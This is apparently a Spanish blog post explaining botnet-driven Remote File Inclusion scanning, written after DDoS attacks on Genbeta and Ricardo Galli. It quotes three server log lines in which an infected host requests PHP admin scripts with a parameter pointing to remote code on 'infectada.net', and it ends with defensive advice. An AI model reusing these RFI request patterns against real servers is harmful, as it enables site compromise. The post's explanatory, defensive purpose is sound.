A lo largo del mes pasado, Ricardo Galli (del cual he hablado antes en esta web) ha denunciado la existencia de redes de bot-nets que se comportan como soldados de fortuna, es decir, se alquilan al mejor postor para tirar sitios mediante ataques DDoS, y quien sabe para que mas.
Esto me dejó muy perplejo, ya que va mucho mas allá de lo que yo nunca vi hacer en mis épocas de coqueteos con el mundo "under". Hay organizaciones, o mejor dicho grupillos, de usuarios que hackean servidores por diversión, para usarlo para alojar warez, y para mas cosas bastante "inofensivas" (que nadie se cabree, pero nunca para joder a nadie). Algunas están muy a la luz, y se dedican a explotar exploits viejos de sistemas o programas para instalar sus propios programas en maquinas remotas o optener acceso. Pero no destruir nada.
A raiz, del famoso ataque a Genbeta y a Galli (tirar de google, ya que encontrareis muchos resumenes), han surgido muchos nombres, y se han destapado mucha basura...
La mayoria de nosotros, pasariamos de largo, ya que nos da un poco igual, pero mi curiosidad ha ido un poco mas allá... Mire unos log de un servidor web. Y me encontré con rastros muy explicativos:
83.172.140.56 - - [29/Feb/2008:12:56:41 +0100] "GET //core/admin/categories_add.php?absoluteurl=http://infectada.net/modules/.jpg?? HTTP/1.1" 404 8318 "-" "libwww-perl/5.65"
83.172.140.56 - - [29/Feb/2008:12:56:42 +0100] "GET /core/admin/admin.php?p=admin&absoluteurl=http://infectada.net/modules/.jpg?? HTTP/1.1" 404 8318 "-" "libwww-perl/5.65"
83.172.140.56 - - [29/Feb/2008:12:56:43 +0100] "GET //core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=http://infectada.net/modules/.jpg?? HTTP/1.1" 404 8318 "-" "libwww-perl/5.65"
Estudiemos que esta ocurriendo, simplemente estamos viendo un intento de escaneo del servidor. La maquina infectada, 83.172.140.56, esta siendo controlada y prueba si es capaz de hacer un RFI, en el servidor. ¿Lo cualo?, vale, mas simple: esa ip, trata de ejecutar el código que contiene la web "infectada.net", que aunque tiene pinta de ser un jpg, no deja de ser una pieza de codigo PHP, que simplemente testea si se puede hacer el exploit. Si es asi, deja un log para luego atacar la web. El código en cuestión suelen ser derivaciones de un script programado por un tal "Mic22". Cuando te marcan como infectable, por el mismo método, pueden ejecutar un script que escriba otro código, aun mas malvado, en tu servidor y ser ejecutado simplemente visitando una pagina de tu web.
Es de destacar, que para hacer un RFI, se tienen que dar ciertas condiciones que no son muy normales, como una configuración del PHP, y tener una página con PHP con un codigo que permita ejecutar otro archivo. Pero curiosamente, hay una barbaridad de páginas infectadas.
A cualquiera nos pueden joder, mas aún usando scripts como PHPNuke, Wordpress, etc... Resulta mucho mas sencillo infectar sistemas que con el clasico overflow.
Tan sencillo, como que hay varios manuales que explican como hacerlo... si no, aquí uno sencillo.
¿Soluciones?. Manten tus web libres de bugs, actualiza tus scripts (si los usas), usa el .htaccess, y simplemente revisa tus logs. Pero, será dificil lograr no resultar escaneado, ya que sin duda, cada vez es mas sencillo hacer una botnet.
Entradas
No hay comentarios:
Publicar un comentario